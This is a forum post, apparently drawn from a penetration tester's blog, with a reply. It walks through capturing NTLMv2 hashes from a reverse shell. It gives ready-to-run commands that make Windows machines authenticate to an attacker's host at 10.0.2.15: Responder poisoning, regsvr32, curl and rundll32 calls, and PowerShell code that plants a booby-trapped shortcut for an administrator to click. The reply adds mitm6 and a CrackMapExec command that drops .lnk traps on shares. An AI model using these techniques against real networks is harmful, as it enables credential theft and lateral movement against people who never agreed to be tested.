Capturing Hashes

A little from my Blog that I wanted to share here as well.

DMCXBLUE

These examples will be used from a Reverse Shell, as not always we have the great GUI to use when we are in an engagement or simply it’s just not available because of X reason. I will try me best to work with this situation as I as well would love to be capable of running many techniques from just a simple Shell, [ don’t know why but like it more that way ].

Responder

In the first example I will use an awesome tool called “ Responder ” a great tool used for Poisoning LLMNR and NBT-NS responses, this cool works great when a user mistakenly mistypes a network share, the reason it works is because when Microsoft can’t find the Network name (DNS) it will fall back to LLMNR and NBT-NS from here responder, Responds to the connection telling the user that “Yes I am [Insert Name Here] and will capture the Ntlmv2 hash used for Authentication here is a sample on how to capture it with your Shell.

Use the “dir” command and try to list an UN-existing share from here Responder will start it’s magic in responding to that UN-existing share.

dir \\NotHere\C$

Reverse Shell

SMBServer.py

A great tool from Impacket here we can create a fast SMB Server to share files and to Exfiltrate any Loot that we may find on the Network but we are focused in grabbing hashes, so how would this work?, Easy we setup the SMB Server and then we simply connect to it to capture the Hash.

In this example we also need to use the IP Addr of the attacking machine with it’s Share Name that we are trying to access.

dir \\<IP ADDR>\Fake-SMB

The user will receive an error like this if they ever try to access the Share you have to make sure to add SMB2Support for Compatibility Issues.

Error Message

Regsvr32.exe

With this tool we can try and call an unexisting file from our Attacking Machine it will try to communicate and from here as well we will capture the Ntlmv2 Hash.

regsvr32.exe /s /u /i://10.0.2.15/@NotExist scrobj.dll

ShortCut Links

What about Shortcut Links, make our target thing that they are trying to visit a website but they actually pinged our Machine??, Well since we have a powershell Shell we can create a simple LNK File to do this. We can use the following:

$WshShell = New-Object -comObject WScript.Shell
$shortcut = $WshShell.CreateShortcut("hash.url")
$shortcut.TargetPath = "file://10.0.2.15/@NOTHERE"
$shortcut.Save()

And finally we can just call it from Powershell or wait for Our Target to execute it, we might want to do some SE here and make it like we replaced an LNK of there own.

Executing

Curl

Yes as mentioned here, we can use Curl to capture NTLM hashes as well you mostly have to wonder about applications that make network connections as Curl is now integrated in Windows CMD and PowerShell it’s as simple as typing:

curl \\10.0.2.15\NOTHERE.txt

Responder Ready:

These are just a few techniques, methods which we can utilize from our trusty old ncat Shell and grab some NTLMv2 hashes and the good thing is that we don’t even need to Escalate Privileges we can just leave these files and wait for an Administrator to click them [ It sometimes happens! ] and we can capture those hashes as well from here we know how to proceed now we can use any Password Cracker [John, Hashcat, etc] To crack these hashes their are more techniques that are very useful for even catching a Shell [NTLM Relay] but we won’t dive into that I just wanted to demonstrate a few techniques on how to capture some hashes be wary it can be as simple as rundll32.exe \\10.0.2.15\NOTHERE.txt,entrypoint . [Another technique not explained] but you get the idea these binaries have network connection’s not just to execute remote files or download but we can capture Hashes as well!.

3 Likes

This is really dope!

I just used this on an engagement:

mitm6 -i eth0
responder -I eth0

I also love using CME w/ Slinky.

cme smb hosts.txt -u 'username' -p 'pass' -M slinky -o NAME=cache SERVER=yourip

This will drop .lnk files that will give you hashes when somebody visits that directory!

Mitm6 worked when Responder didn’t because LLMNR poisoning was blocked.

3 Likes